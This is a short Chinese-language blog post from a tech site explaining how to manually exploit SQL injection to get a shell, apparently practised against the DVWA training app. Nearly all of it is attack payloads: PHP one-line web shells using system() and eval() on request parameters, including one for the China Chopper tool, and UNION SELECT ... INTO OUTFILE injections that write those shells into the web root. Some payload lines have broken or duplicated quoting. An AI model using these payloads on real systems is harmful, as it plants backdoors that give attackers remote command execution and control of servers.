溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

SQL inject 漏洞手工利用過程詳解:get shell

發(fā)布時間:2020-07-22 16:57:07 來源:網(wǎng)絡(luò) 閱讀:899 作者:張菩嘉 欄目:數(shù)據(jù)庫

思路:上傳一個“后門”,通過控制后門來得到shell,比如一句話***。比如:

<?system($_REQUEST['cmd']);?> //通過request提交,執(zhí)行shell<?php@eval($_POST['chopper']);?>

//PHP一句話***,直接上菜刀


這里構(gòu)造如下語句:

1'and 1=2 union select "<?",system($_REQUEST['cmd']);?>"

into outfile "d:\\xampp\\htdocs\\dvwa\\yy.php"#



1' and 1=2 union select 1,"<?system($_REQUEST['cmd']);?>" into outfile "f:\\xampp\\htdocs\\dvwa\\zzz.php"--

SQL inject 漏洞手工利用過程詳解:get shell



1' and 1=2 union select "<?","system($_REQUEST['cmd']);?>" into outfile "d:\\

xampp\\htdocs\\dvwa\\zzz.php"


<?php eval($_POST['888']);?>


1' and 1=2 union select 1,"<?php eval($_POST['888']);?>" into outfile "d:\\xampp\\htdocs\\dvwa\\yyy.php"#

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI